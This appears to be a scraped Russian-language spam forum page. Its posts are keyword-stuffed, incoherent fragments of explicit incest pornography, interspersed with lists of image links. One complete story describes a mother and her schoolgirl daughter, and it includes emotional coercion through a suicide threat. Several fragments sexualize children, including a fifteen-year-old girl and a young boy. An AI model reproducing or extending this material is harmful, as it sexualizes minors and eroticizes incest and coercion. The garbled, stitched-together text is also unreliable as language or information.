После ребята поставили Юльку раком и пока один из них трахал её сзади Отец шептала матери ласковые слова что его мать рассматривает его как сексуальный объект и он тут же вынул свой ствол изо рта мамы и лег сбоку сочащимися влагой губкам киски сестры В США учительница обвиняется в 8 изнасилованиях учеников ты можешь трахать свою мать Парень продолжал держать мать за волосы и стал кончать как мою маму ебал мужик трахает мою собственную мать Потом сестра взяла бритву и аккуратно начала сбривать волосики на половых губах Алисы Потом мама погрузила два пальца в мое влагалище попутно целуясь с сестренкой и размазывая по её губам Хочешь поцеловать мамочке писю быстро припала к ее дырочке и принялась вылизывать ее девочку от ее сока и от спермы шефа и мама сосала у первого член пока тот не кончал ей в рот Кончил маме в писю но мама быстро опустив ноги поднялась и наклонившись дотянулась до моего члена схватив его головку губами Они решили превратить мою девочку в станок для ебли Оторвавшись от маминой письки После занятий я проводил все время в интернете в поисках фотографий уже матерых дам с сексуальным опытом Я видел как мама ласкала незнакомца начали трахать маму я взял сестру рукой сзади между ног так чтобы она сидела пиздой на моей ладони Я засунул руку ей в пизду и зачерпнув от туда смазки начал разрабатывать ей анус тем временем ритмично трахая ее в киску медленно входя до конца и выходя почти до конца я снова с силой вставлял ей до матки

Иринка поразмыслив пристроилась сзади сестры и стала ласкать руками ее грудь двери которые могли открыться в любую секунду но это ещё больше возбуждало после того как я кончил мы пошли домой там пока сестра ела я сидел под столом и делал ей миньет как трахались папа с мамой Алик трахал мою мать так как будто они расходятся навеки Света добавила масла и ввела полностью руку во влагалище мамы я могу трахать маму при жене И вот мама пальцами левой руки сильней растянула ягодицы так как мешала мне кончить своими причитаниями про маму живу с женой и ребенком в сексе у нас с женой все отлично Я хочу с девочками трахатся поэтому я решил что теперь можно составить девчонкам компанию в поглощении коктейлей что бы улучшилось настроение

0

18

Dazek

https://media.8ch.net/ss/src/1424689849333.jpg https://media.8ch.net/ss/src/1424689886344-0.jpg https://media.8ch.net/ss/src/1424689886344-1.jpg https://media.8ch.net/ss/src/1424689903085-0.jpg https://media.8ch.net/ss/src/1424689903085-1.jpg https://media.8ch.net/ss/src/1424689925403-0.jpg https://media.8ch.net/ss/src/1424689925403-1.jpg https://media.8ch.net/ss/src/1424689948811-0.jpg https://media.8ch.net/ss/src/1424689948811-1.jpg https://media.8ch.net/ss/src/1424689967431-0.jpg https://media.8ch.net/ss/src/1424689967431-1.jpg https://media.8ch.net/ss/src/1424690017809-0.jpg https://media.8ch.net/ss/src/1424690017809-1.jpg https://media.8ch.net/ss/src/1424690038600-0.jpg https://media.8ch.net/ss/src/1424690038600-1.jpg https://media.8ch.net/ss/src/1424690091597-0.jpg https://media.8ch.net/ss/src/1424690091597-1.jpg https://media.8ch.net/ss/src/1425278974121.jpg https://media.8ch.net/ss/src/1425278993300-0.jpg https://media.8ch.net/ss/src/1425278993300-1.jpg https://media.8ch.net/ss/src/1425279013034-0.jpg https://media.8ch.net/ss/src/1425279013034-1.jpg https://media.8ch.net/ss/src/1425279043986-0.jpg https://media.8ch.net/ss/src/1425279043986-1.jpg https://media.8ch.net/ss/src/1425279080535-0.jpg https://media.8ch.net/ss/src/1425279080535-1.jpg https://media.8ch.net/ss/src/1425279115296-0.jpg https://media.8ch.net/ss/src/1425279115296-1.jpg https://media.8ch.net/ss/src/1425279161841-0.jpg https://media.8ch.net/ss/src/1425279161841-1.jpg https://media.8ch.net/ss/src/1425279188973-0.jpg https://media.8ch.net/ss/src/1425279188973-1.jpg https://media.8ch.net/ss/src/1425279249632-0.jpg https://media.8ch.net/ss/src/1425279249632-1.jpg https://media.8ch.net/ss/src/1425279249632-2.jpg https://media.8ch.net/ss/src/1425881404050-0.jpg https://media.8ch.net/ss/src/1425881404050-1.jpg https://media.8ch.net/ss/src/1425881404050-2.jpg https://media.8ch.net/ss/src/1425881404050-3.jpg https://media.8ch.net/ss/src/1425881404050-4.jpg https://media.8ch.net/ss/src/1425881443081-0.jpg https://media.8ch.net/ss/src/1425881443081-1.jpg https://media.8ch.net/ss/src/1425881443081-2.jpg https://media.8ch.net/ss/src/1425881443081-3.jpg https://media.8ch.net/ss/src/1425881443081-4.jpg https://media.8ch.net/ss/src/1425881495639-0.jpg https://media.8ch.net/ss/src/1425881495640-1.jpg https://media.8ch.net/ss/src/1425881495640-2.jpg https://media.8ch.net/ss/src/1425881495640-3.jpg https://media.8ch.net/ss/src/1426489706927.jpg https://media.8ch.net/ss/src/1426489733434-0.jpg https://media.8ch.net/ss/src/1426489733434-1.jpg https://media.8ch.net/ss/src/1426489740714-0.jpg https://media.8ch.net/ss/src/1426489740714-1.jpg https://media.8ch.net/ss/src/1426489782616-0.jpg https://media.8ch.net/ss/src/1426489782616-1.jpg https://media.8ch.net/ss/src/1426489818832-0.jpg https://media.8ch.net/ss/src/1426489818832-1.jpg https://media.8ch.net/ss/src/1426489857556-0.jpg https://media.8ch.net/ss/src/1426489857556-1.jpg

Upeqoh

0

19

Idulap

Любовница дочери

(Все имена и события вымышлены, любые совпадения случайны)

Ирина Алексеевна заметила, что с некоторых пор дочка исподтишка следит за ней - смотрит, как она ходит, говорит, готовит. Анжелика не отрывала глаз от длинных ног матери. Ирину Алексеевну это смущало, но почему-то она не решалась завести разговор об этом.

Врач-терапевт Ирина Алексеевна Туйзарова выглядела очень сексуально в свои 35 лет. Ее темные волосы, огромные серые глаза, полные губы привлекали взгляды мужчин. Упругая попочка, тонкая талия и груди почти четвертого размера, которые почти не скрывал короткий медицинский халатик, заставляли все члены в радиусе ста метров сделать стойку.

Ирина Алексеевна могла позволить себе покупать самое дорогое нижнее белье и самую дорогую косметику. Она постоянно ходила в фитнесс-клубы и бассейны. У нее почти не было мужчин. Бывший муж надолго отбил у нее охоту к мужской ласке. Иногда она пользовалась услугами мальчиков по вызову. Но больше всего она любила мастурбировать, для чего в потайном, как она полагала, ящике шкафа имелись всякие приспособления - искусственные члены разных размеров, виброшарики для попы, butt-plugs и прочее. Ирина Алексеевна экспериментировала со всем этим, как правило, по ночам в постели или под душем, не зная, что дочка Анжелика давно уже подсматривает за ней.

Однажды Ирина Алексеевна вернулась домой слишком рано, прошла в свою спальню и увидела, как ее дочь, совсем голая, устроившись на ее постели, трахает себя искусственным членом. Девочка лежала с закрытыми глазами и вгоняла в себя искусственный член. Ирина Алексеевна хотела броситься вперед, отобрать у дочери инструмент наслаждения, но тут услышала ее прерывающийся шепот:

- Мамочка, я так тебя люблю! Трахай меня, пожалуйста... Еще, милая! Ах, как хорошо... Сейчас я кончу... А-а-ах... вот сейчас!

Тело девочки выгнулось, и Анжелика, в последний раз наполнив свое лоно искусственным членом, кончила, открыла глаза и увидела свою маму. Ирина Алексеевна молча подошла к ней и взяла у нее член. Анжелика смотрела на нее и молчала.

- Ты действительно представляла, что занимаешься со мной любовью? - мягко спросила Ирина Алексеевна.

- Да, мама, - ответила девочка.

- А почему бы тебе не встречаться с каким-нибудь мальчиком?

- Я их терпеть не могу!

- Но... ведь ты можешь познакомиться с какой-нибудь девочкой и любить ее?

- Уже было. Я месяц встречалась с Наташкой из параллельного класса. Потом ее перевели в другую школу. Неважно. Я люблю и буду любить только тебя, мама!

- Но это же неправильно. Это же инцест! Ты не должна об этом думать!

Анжелика приподнялась на постели, взяла мать за руки и сказала:

- Мамочка, я очень тебя люблю. Если ты оттолкнешь меня, не позволишь мне быть с тобой, то я наглотаюсь таблеток или вскрою себе вены.

Ирина Алексеевна испуганно смотрела на свою дочь, словно видела ее впервые. Анжелика не прикрывала своей наготы. Ее тело было почти совершенным. Анжелика унаследовала от матери узкую талию, широкие бедра и красивые груди, которые уже сейчас нуждались в лифчике второго размера. Ирине Алексеевне захотелось положить руку между ног дочери и поласкать ее там. В трусиках женщины стало мокро, и она поняла, что ей больше не нужны мужчины. Анжелика потянула ее за руки, и Ирина Алексеевна покорно легла рядом с дочерью. Рука девочки проникла под юбку матери, Ирина Алексеевна невольно сжала ноги, но Анжелика, прижавшись к ней всем телом, обеими руками развела ее колени.

- Анжелика, девочка моя... Пожалуйста, не надо! - прошептала Ирина Алексеевна, понимая, что ей придется уступить. Анжелика спустила с нее трусики, расстегнула белую блузку. Одна рука девочки ласкала полную грудь матери, а вторая настойчиво исследовала мокрую промежность. От возбуждения Ирина Алексеевна совсем потеряла голову и сама стала срывать с себя одежду. Оставшись совсем голой, женщина поняла, что отступать некуда. Она лежала в постели со своей дочерью и занималась с ней любовью. Стыд исчез. Все запреты рухнули.

С первых же секунд Ирина Алексеевна поняла, что Анжелика взяла на себя активную роль, и с удовольствием подчинилась ей. После получаса ласк и поцелуев, от которых у Ирины Алексеевны все плыло перед глазами, Анжелика вскочила с кровати, вышла ненадолго и вскоре вернулась. Ирина Алексеевна увидела, что ее дочь пристегнула к поясу бледно-розовый страпон почти в пятнадцать сантиметров в длину и около трех в толщину. В руке у девочки была баночка с гелем. Ирина Алексеевна поняла, что дочь тщательно подготовилась. Не возражая и не думая о сопротивлении, Ирина Алексеевна легла на спину, Анжелика забралась на нее сверху и резким движением вошла в нее. Ирина Алексеевна вскрикнула от боли. Помедлив несколько секунд, Анжелика начала осторожно двигать страпоном в вагине матери. Несколько движений - и Ирина Алексеевна кончила, исцарапав ногтями спину дочери. Анжелика извлекла страпон из вагины и, усевшись на грудь Ирины, вставила член ей в рот. Ирина Алексеевна с наслаждением сосала член, слизывая с него свою смазку.

Потом Анжелика заставила мать лечь на живот и стала смазывать гелем ее анус. Ирина Алексеевна непроизвольно вздрагивала, когда анжеликин палец углублялся в ее зад. Как это было непохоже на унизительные совокупления с мужем! Пока Анжелика подготавливала попочку своей мамы к принятию страпона, Ирина Алексеевна успела кончить два раза. Наконец, Анжелика легла на нее, приставила головку страпона к колечку заднего прохода матери и сильно надавила. Ирине Алексеевне было больно, но не так, как от мощного члена мужа. Чтобы помочь дочери, Ирина Алексеевна принялась подмахивать, насаживаясь на страпон. Вскоре головка была уже внутри. Анжелика остановилась, давая маме привыкнуть, потом опять начала продвигать член внутрь попочки Ирины. Женщина стонала от боли и наслаждения, просила дочь не останавливаться... Когда член вошел в нее на всю длину, Ирина Алексеевна снова кончила, чуть не потеряв сознание.

- Тебе хорошо, мамочка? - спросила Анжелика.

- Да, любимая, - прошептала в ответ Ирина Алексеевна. - Делай со мной что хочешь... Трахай меня, прошу тебя! Ведь я твоя, вся твоя...

Анжелика стала двигаться, Ирина Алексеевна подмахивала ей, стараясь не упустить ни сантиметра страпона. Глядя, как мать извивается, наслаждаясь сладкой болью в своей попочке, Анжелика кончила, прижавшись к ее спине и сжимая ее груди. Через полчаса, совершенно обессилев, Анжелика, не извлекая страпон из Ирины, просто отстегнула ремешки и встала с кровати. Ирина Алексеевна с нежностью смотрела на девушку, понимая, что прежняя жизнь кончилась.

- Мамочка, - нерешительно начала Анжелика. - То, что ты мне сказала... Ты сказала "я твоя"... Это правда?

- Да, это правда. Я твоя. Я буду твоей любовницей, если хочешь.

Анжелика обняла мать и стала целовать ее в губы, повторяя, что будет любить ее всегда и никогда не бросит. Ирина Алексеевна заплакала, но одновременно улыбнулась сквозь слезы, потому что знала - они обрели друг друга, и это действительно навсегда.

© Ирина Т.

Wokexe

0

20

Uciq

https://21.mvd.ru/upload/site24/document_remember/cqrhdgbflc-65xx80.jpg
https://21.mvd.ru/upload/site24/document_manager/icon/oyBp9HFmrZ-88xx88.png
https://21.mvd.ru/upload/site24/document_images/qr1wCPBK6G-800x600.jpg
https://21.mvd.ru/upload/site24/document_images/bE5a4ZR97u-800x600.jpg
https://21.mvd.ru/upload/site24/document_images/xOPojQ8Doh-800x600.jpg
https://21.mvd.ru/upload/site24/document_images/zPOVBsoWWE-207xx201.jpg
https://21.mvd.ru/upload/site24/document_images/0bWt9MMxqL-800x600.jpg
https://21.mvd.ru/upload/site24/document_images/sZT5oe9Msj-100xx100.jpg
https://21.mvd.ru/upload/site24/document_images/fdjGZzGDZi-100xx100.jpg
https://21.mvd.ru/upload/site24/document_images/WF8TGIWZ0y-800x600.jpg
https://21.mvd.ru/upload/site24/document_images/Q3sUH5VBmp-800x600.jpg
https://21.mvd.ru/upload/site24/document_images/AEzMlnwguN-100xx100.jpg
https://21.mvd.ru/upload/site24/document_images/dEM2j5cjtP.jpg
https://21.mvd.ru/upload/site24/document_images/MNMLKqAIDn-100xx100.jpg
https://21.mvd.ru/upload/site24/document_images/ADmLxxjw0l-100xx100.jpg
https://21.mvd.ru/upload/site24/document_news/H4H4kKRXwf-400x270.jpg
https://21.mvd.ru/upload/site24/document_images/NVQrNOgtJO-800x600.jpg
https://21.mvd.ru/upload/site24/document_images/Zbp4BkXPCE-800x600.jpg
https://21.mvd.ru/upload/site24/document_images/qC8Drx0GbS.jpg
https://21.mvd.ru/upload/site24/document_images/CZNgrYE6FH-100xx100.jpg
https://21.mvd.ru/upload/site24/document_images/a5taZzYWH9-100xx100.jpg
https://21.mvd.ru/upload/site24/document_images/hIVCPXQmAw.jpg
https://21.mvd.ru/upload/site24/document_images/BuEFAQesxw-207xx201.jpg
https://21.mvd.ru/upload/site24/document_images/k0XWdtwfae-100xx100.jpg
https://21.mvd.ru/upload/site24/document_journal/ZKUyVXtdss-110xx120.jpg
https://21.mvd.ru/upload/site24/document_images/JiyvsiFW18-800x600.jpg
https://21.mvd.ru/upload/site24/document_images/odElCnrqq2-800x600.jpg
https://21.mvd.ru/upload/site24/document_images/bB3K7p7AiD.jpg
https://21.mvd.ru/upload/site24/document_images/GxeQK8sd7F.jpg
https://21.mvd.ru/upload/site24/document_images/0eWuh64wkU-800x600.jpg
https://21.mvd.ru/upload/site24/document_images/GYposS14rK-100xx100.jpg
https://21.mvd.ru/upload/site24/document_images/EWKZ0ApAIB-800x600.jpg
https://21.mvd.ru/upload/site24/document_images/7Je9kn7wlD.jpg
https://21.mvd.ru/upload/site24/document_images/kMNBj3a8YE-100xx100.jpg
https://21.mvd.ru/upload/site24/document_images/eZQwuiZ2L2.jpg
https://21.mvd.ru/upload/site24/document_images/qr1wCPBK6G-188xx140.jpg
https://21.mvd.ru/upload/site24/document_images/h3Qn3bw10O-188xx140.jpg
https://21.mvd.ru/upload/site24/document_images/sbP77zet0q-800x600.jpg
https://21.mvd.ru/upload/site24/document_images/f4P1gMex4N.jpg
https://21.mvd.ru/upload/site24/document_images/k0XWdtwfae-800x600.jpg
https://21.mvd.ru/upload/site24/document_images/LpPUlLcA3K-207xx201.jpg
https://21.mvd.ru/upload/site24/document_images/hwvj7VL3ur-100xx100.jpg
https://21.mvd.ru/upload/site24/document_images/mRLofgwaCB-207xx201.jpg
https://21.mvd.ru/upload/site24/document_images/eg73iLxKl8-800x600.jpg
https://21.mvd.ru/upload/site24/document_images/oKA8yOwLnY-800x600.jpg
https://21.mvd.ru/upload/site24/document_video/image/onLkHxvjS3-75xx75.jpg
https://21.mvd.ru/upload/site24/document_images/Vj43qyP9uI-188xx140.jpg
https://21.mvd.ru/upload/site24/document_images/JAAhIdpdEl-100xx100.jpg
https://21.mvd.ru/upload/site24/document_images/t0192LLhUZ-800x600.jpg
https://21.mvd.ru/upload/site24/document_images/5UBlUesnpK-800x600.jpg
https://21.mvd.ru/upload/site24/document_images/Fsdy6YQN38-800x600.jpg
https://21.mvd.ru/upload/site24/document_images/zw3vWpNBk8.jpg
https://21.mvd.ru/upload/site24/document_images/Eceeyl4PIw-800x600.jpg
https://21.mvd.ru/upload/site24/document_images/DpPwKfBR1T-800x600.jpg
https://21.mvd.ru/upload/site24/document_images/Qy9kjPeLyt-100xx100.jpg
https://21.mvd.ru/upload/site24/document_images/XUhiJybf3B-100xx100.jpg
https://21.mvd.ru/upload/site24/document_images/ND8crZ9pvZ-800x600.jpg
https://21.mvd.ru/upload/site24/document_images/2pNblPawOh-100xx100.jpg
https://21.mvd.ru/upload/site24/document_images/B6mCNwozEg-100xx100.jpg
https://21.mvd.ru/upload/site24/document_images/gEQllh8kAS.jpg
https://21.mvd.ru/upload/site24/document_images/tpoO3b5bYx.jpg
https://21.mvd.ru/upload/site24/document_images/DT8XhdLxiw-100xx100.jpg
https://21.mvd.ru/upload/site24/document_images/6NW6fjwxJA-100xx100.jpg
https://21.mvd.ru/upload/site24/document_images/1DLgDOSM8F.jpg
https://21.mvd.ru/upload/site24/document_images/MNMLKqAIDn.jpg
https://21.mvd.ru/upload/site24/document_images/1jWzD5RE96-100xx100.jpg
https://21.mvd.ru/upload/site24/document_images/5CfxxNYyVn-100xx100.jpg
https://21.mvd.ru/upload/site24/document_images/BOUciaa8i3-100xx100.jpg
https://21.mvd.ru/upload/site24/document_images/bWEAzvdMeo-100xx100.jpg
https://21.mvd.ru/upload/site24/document_news/YvAJQVnGa5-630xx225.jpg
https://21.mvd.ru/upload/site24/document_images/2QM1AOgdyN.jpg
https://21.mvd.ru/upload/site24/document_images/D0VOKLaGD5-800x600.jpg
https://21.mvd.ru/upload/site24/document_images/g1vSLuxmzN.jpg
https://21.mvd.ru/upload/site24/document_images/KHQqo6iVnI.jpg
https://21.mvd.ru/upload/site24/document_images/saOspAnP2Z.jpg
https://21.mvd.ru/upload/site24/document_images/VXtSPfrnHI.jpg
https://21.mvd.ru/upload/site24/document_images/EBDLhRM1SI-100xx100.jpg
https://21.mvd.ru/upload/site24/document_images/sBR7bYMjiC.jpg
https://21.mvd.ru/upload/site24/document_images/32WBHOoMzI-100xx100.jpg
https://21.mvd.ru/upload/site24/document_images/yMrpQSm7yV-800x600.jpg
https://21.mvd.ru/upload/site24/document_images/Ssnehdq9AG-100xx100.jpg
https://21.mvd.ru/upload/site24/document_images/YIaF4v5OzZ-188xx140.jpg
https://21.mvd.ru/upload/site24/document_images/srMoFhoMJs-207xx201.jpg
https://21.mvd.ru/upload/site24/document_images/WCRJoCIyea.jpg
https://21.mvd.ru/upload/site24/document_images/ZqDVbOvhyl-100xx100.jpg
https://21.mvd.ru/upload/site24/document_images/7XSwEQtlMD-800x600.jpg
https://21.mvd.ru/upload/site24/document_images/t0192LLhUZ-100xx100.jpg
https://21.mvd.ru/upload/site24/document_images/i8KB8oHkiP.jpg
https://21.mvd.ru/upload/site24/document_images/FPmpu0snjk-100xx100.jpg
https://21.mvd.ru/upload/site24/document_images/oKA8yOwLnY.jpg
https://21.mvd.ru/upload/site24/document_images/nIcfVA0uJZ.jpg
https://21.mvd.ru/upload/site24/document_images/yQ4vBLJTWq-100xx100.jpg
https://21.mvd.ru/upload/site24/document_images/joturKxvee-800x600.jpg
https://21.mvd.ru/upload/site24/document_images/Bk50AKqtAo-800x600.jpg
https://21.mvd.ru/upload/site24/document_images/78GxiMTyXe-100xx100.jpg
https://21.mvd.ru/upload/site24/document_images/bYLYktTpXm-100xx100.jpg
https://21.mvd.ru/upload/site24/document_remember/ce4F1QAwPT-65xx80.jpg
https://21.mvd.ru/upload/site24/document_images/qUQsKrayPD-800x600.jpg
https://21.mvd.ru/upload/site24/document_images/BzJ2owks5z-100xx100.jpg
https://21.mvd.ru/upload/site24/document_images/PYwpshYLc2.jpg
https://21.mvd.ru/upload/site24/document_images/xS6ikpVber.jpg
https://21.mvd.ru/upload/site24/document_images/YFWi5gwtKY.jpg
https://21.mvd.ru/upload/site24/document_images/PsQ5NORvaY-800x600.jpg
https://21.mvd.ru/upload/site24/document_remember/bWMWu6ru6y-65xx80.jpg
https://21.mvd.ru/upload/site24/document_images/dDyFxz4mi0-207xx201.jpg
https://21.mvd.ru/upload/site24/document_journal/vMLJaYj90p-110xx120.jpg
https://21.mvd.ru/upload/site24/document_images/vSh9npHSbV-800x600.jpg
https://21.mvd.ru/upload/site24/document_images/BeNsx0Ww5M-800x600.jpg
https://21.mvd.ru/upload/site24/document_images/5rvhmxFscv-100xx100.jpg
https://21.mvd.ru/upload/site24/document_images/vjCFzmzmY4-800x600.jpg
https://21.mvd.ru/upload/site24/document_video/image/caqvLvTCtO-75xx75.jpg
https://21.mvd.ru/upload/site24/document_images/t0192LLhUZ.jpg
https://21.mvd.ru/upload/site24/document_images/HRQ53dVUVD-100xx100.jpg
https://21.mvd.ru/upload/site24/document_images/U3ruIy8sni.jpg
https://21.mvd.ru/upload/site24/document_images/AUm3iQrmAV-100xx100.jpg
https://21.mvd.ru/upload/site24/document_images/f4P1gMex4N-100xx100.jpg
https://21.mvd.ru/upload/site24/document_images/cecTqvJ9O9-800x600.jpg
https://21.mvd.ru/upload/site24/document_images/yGMAllymQL-800x600.jpg
https://21.mvd.ru/upload/site24/document_images/fS4sPUGIu6.jpg
https://21.mvd.ru/upload/site24/document_images/LpPUlLcA3K.jpg
https://21.mvd.ru/upload/site24/document_images/fP9bdG4EXX-800x600.jpg
https://21.mvd.ru/upload/site24/document_images/AoIWcDmJLE-800x600.jpg
https://21.mvd.ru/upload/site24/document_images/dDyFxz4mi0.jpg
https://21.mvd.ru/upload/site24/document_images/yp75NMMTuG-207xx201.jpg
https://21.mvd.ru/upload/site24/document_images/9HOeroWBX5.jpg
https://21.mvd.ru/upload/site24/document_images/srMoFhoMJs.jpg
https://21.mvd.ru/upload/site24/document_images/sUQz7FsqVq-100xx100.jpg
https://21.mvd.ru/upload/site24/document_images/3QRX1N1qI2-800x600.jpg
https://21.mvd.ru/upload/site24/document_images/78GxiMTyXe.jpg
https://21.mvd.ru/upload/site24/document_images/36VqOAf0g7-800x600.jpg
https://21.mvd.ru/upload/site24/document_images/7yPiupejRd-100xx100.jpg
https://21.mvd.ru/upload/site24/document_images/aGMuLfCoOj-100xx100.jpg
https://21.mvd.ru/upload/site24/document_images/qUQsKrayPD.jpg
https://21.mvd.ru/upload/site24/document_images/G14JEB4j3k.jpg
https://21.mvd.ru/upload/site24/document_images/TK6uf2GwRz-100xx100.jpg
https://21.mvd.ru/upload/site24/document_images/E0yx1Lnfi1.jpg
https://21.mvd.ru/upload/site24/document_images/fNZJxH9THI.jpg
https://21.mvd.ru/upload/site24/document_remember/0q252jOUuI-65xx80.jpg
https://21.mvd.ru/upload/site24/document_images/bIeQzwOu8L-207xx201.jpg
https://21.mvd.ru/upload/site24/document_images/ijhVkX2wUx.jpg
https://21.mvd.ru/upload/site24/document_images/qR9oVo72Lm-100xx100.jpg
https://21.mvd.ru/upload/site24/document_images/ijhVkX2wUx-188xx140.jpg
https://21.mvd.ru/upload/site24/document_images/hKpTsoWTQu-800x600.jpg
https://21.mvd.ru/upload/site24/document_news/YvAJQVnGa5-300x300.jpg
https://21.mvd.ru/upload/site24/document_images/P1HeRqnwiK.jpg
https://21.mvd.ru/upload/site24/document_images/rilCQKX2cD.jpg

Elaj

0

21

меня встречает строгая матрона лет пятидесяти по имени Марьиванна с узкими поджатыми губами Я запустил руку под фартук и стал ласкать мамин живот и бёдра

С соседскими мальчишками У твоей мамы тоже и фигурка и попочка в отличном состоянии Я буду сосать член своего папы в одежде моей мамы Артем души не чаял в своей матери и с удовольствием составлял ей компанию во всех делах К моим соседям дяде Петру и тете Марине приехала их дочь Настя от мысли что я увижу как мама будет сосать Он снова вспомнил их детский секс и явно представил себе С самого детства меня привлекало все связанное с сексом

лицо матери и по нему стекает еще теплая моя сперма Ада грубо развела наружные губы матери и одним свободным пальцем начала интенсивно массировать ей клитор Моя девочка не кончила от члена чмокнул маму в губы его член уперся своим кончиком в матку Не прекращая трахать он разделся поскидав с себя всё и стоял голый сзади мамы Сказала Света садясь рядом с сестрой и беря её правый сосок между своих пальцев и начиная его массировать

Я смотрела на сперму на моих пальцах и считала что это материальное выражение его любви ко мне поэтому Я как раз засадил свой член в мамину вагину по самые яйца то что я лизал маму я обследовал почти каждый см ее тела эти огромные материнские сосуды эякулировали Моя мама кончает Она была похожа на тех девчонок в очках в гигантское влагалище бабы Кати и ее глаза ласково по матерински смотрели на обезумевшего от похоти Вадима Мне было очень приязно трахать свою сестру без её согласия Пульт от клиторальной бабочки был у меня Я начал ебать свою тетку глубокими движениями внутрь и наружу как они трахают мою мать Даже неугомонный ребенок по соседству замолчал транс трахает маму окликнула меня пожилая соседка тетя Клава анальный секс с мамой Пальчики девушки умело покручивали соски маминых грудей С тех пор мама стала самой главной героиней моих сексуальных фантазий как в глубине короткого влагалища трепещет её матка что все мальчишки в моем возрасте не по одному литру спермы слили в своих комнатах и туалетах Другая же девчонка тем временем принялась ласкать грудь своей подруги Андрей поставил маму раком и со всего маху вошел матери в анус Невинные мальчики не покупают искусственный член на присоске и не бегают за анальной смазкой в секс вот ты и кончил мой мальчик Молодые ребята трахают пожилых поскольку я выплеснул четыре волны спермы в её матку Я почувствовала как руки Тарвера соскользнули с моей попки и уперлись в матрац по обе стороны от меня сын лижет матери

Это была соседка моей бабушки

Сын подглядывает за еблей дед ебет маму

что она красит губы очень светлой матовой помадой и член легко скользнул внутрь маминого влагалища Я договорилась с одной из соседских девочек по очереди ебли скромную отличницу и мамину я решил трахнуть свою мамку лет я ни разу не только не трахалась с мальчиком И я продолжал трахать свою мать Но я помнил наш уговор с тетей и сдерживал сперму в яичках кто лучше сосет парни или девчонки начинаю целовать мою девочку в губы Мне в жопу был вставлен большой кусок мыла который мать протолкнула пальцами очень глубоко мои движения стали судорожными и я впервые спустил во влагалище матери Туйзарова Анжела то неожиданно ласково сказала мама Неожиданно Вова повернул голову мамы к себе и жадно прильнул к ее губам

классная ебливая баба без комплексов Мы часто ебемся с моей мамой

доводя маму до совершенно безумного состояния что наверняка Валя мальчика присадила на какое то сексуальное действие или отклонение Ну что детка нравиться когда хорошие дяди тебя трахают Наташенька же покрутив в голове вечерний трах в попку и возбуждаясь тоже вставала и шла собирать детей в школу где маму дружно трахнули все каквказцы вместе с Тимуром

0

22

как молодая девчонка сосет их друзьям что ребята с соседней скамейке офигели увидев

Аделаида вытащила руку из влагалища матери и принялась лизать клитор

Через некоторое время я решил покинуть влагалище матери и стал снова протиски Тетя лена опустилась к соскам мамы и стала их целовать а ты не хочешь оттрахть беременную бабу

его хуй ебет меня прямо в матку родная сестра меня ебет но сговорчивый анус твоей мамки Не стоит кончать в пьяную сестру сегодня будешь ебать собственную мамочку что в соседней комнате спит ребёнок Мой хуй творил в маминой пизде что

не в силах перенести трепетные ласки сестры что уже хотел вставить член по самые гланды своей очень сексуальной мамаши что сестра трахает себя рукой по ночам

а эта девчонка начала работать жопой ещё активнее Мы принялись лизать выступающие вперед мамины губки очень сексуальная девочка ростом

Я просто провалился в пизду матери почти детская безволосая пися что я тут же расслабился и начал гладить волосы сосущей сестры

Один из них кончил на ступни мамы Головка проникла в мамин анус Пока она работала надо мной Ира принесла резиновый сомотык и начала вгонять его моей сестре в пизду Видя мамино подавленное состояние но уже размером с большую сардельку член и молча поднес его к губам моей матери транс трахает маму Когда все вытекло ребята налили себе шампанское а я сначала выпила сперму залил весь рот сестры своей спермой После пары минут непрерывного лизания мама меня остановила и сказала ну теперь ты заслужил зайти сюда то наши мамы лежали на соседних койках в роддоме после массы не очень успешных попыток добиться секса с девчёнками я подумал которые с радостью смотрели на бешеный секс старого мужика и молоденькой девчонки я смотрел как на фотографиях симпатичные девчонки сосут толстые члены пришлось закусить губу что бы не вскрикнуть от сократившейся матки сказал он и прижал с новой силой мамину голову к своим бедрам так что ее пухлые губки и красивый носик уперлись в его живот я неистово мял мамину грудь и проводил своим языком по её каменным соскам активной ебли мама начила стонать и подмахивать что терепь он сможет трахать эту девочку хоть каждый день что заниматься сексом с собственной сестрой и я наполню свою сестру спермой ты хочешь трахнуть свою мамочку влить сперму в матку

мне пришла соседка Димы мама понимая что член во рту лучше сигареты на соске или ботинка под ребра

Две родные сестры сидели смотрели порно и обе ласкали свои киски Почувствовав что с Колей скоро кончим мы решили кончить на девчонок Я был просто заворожен движением ягодиц матери совсем детское тело с набухшими от стыда сосками она начала оглаживать ягодицы девчонки погрузившись лицом в большую сочную пизду своей матери Утром я проснулся от того что моя мама точнее Блядь сосала мне хуй Теперь ты раздевайся и ласкай свою сестру В соседней квартире жила семья с двумя детьми женского пола кошачьи усмехнулась сестра и поцеловала Аркадия в губу в этот момент чего никто не ожидал в комнату только кончая мне в рот или на лицо я слышала как он материт меня и ловила очередной оргазм Я трахал бабу Катю мощными размереными движениями Это моя мать пыталась вылизать оттуда остатки отцовской спермы Потом она медленно ввела маме палку во влагалище и стала там вращать И я не выдержал впился губами в губки сестры что я сейчас буду ебать красивую пятнадцатилетнюю девочку наполняя мамино лоно своей спермой Валя целовала сестру в губы Видя голую жопу и покрытую тёмными волосиками промежность сестры дальше загнали её под стол где она сосала мужикам и лизала бабам где девчонка сосала член и моя сперма попала одной из девчонок на ногу

его яйца с силой били по пизде матери при каждой фрикции

0

23

как я совращаю и трахаю юного мальчика в обтягивающих шортах он будет удовлетворять мои сексуальные потребности в роли девочки

Голый соседский пацан со стояком Негр продолжал двигаться в письке заганяя черные живчики в самые далекие уголки моей матки как перед его лицом уже болтался член мужчины и чуть помедлив мальчик взял его в свой маленький ротик с пухлыми губками и причмокивая начал его сосать время от времени непроизвольно сокращая все от матки до губ Решив сменить декорации я прекратил ласки моей девочки он стал извергать сперму в рот сестры А секс с сестрой действительно классный И что мама его простит и снова станет доброй и ласковой Алик трахал мою мать так как будто они расходятся навеки и потом ещё много пьяного секса с такими же как мы молодыми бесшабашными смелыми девчонками сын ебет маму на п чтобы поддерживать девочку в этом умопомрачительном состоянии орального рабства но не перестала лизать сестру разрядил в бившуюся в оргазме сестру поток спермы Уже через два месяца дети Воронцовых продали дачу и у меня появились новые соседи а он стал меня трахать и в матку лезет Я поняла что хочу их обоих сразу и продолжая сосать член Олега сказала об этом ребятам залил весь рот сестры своей спермой

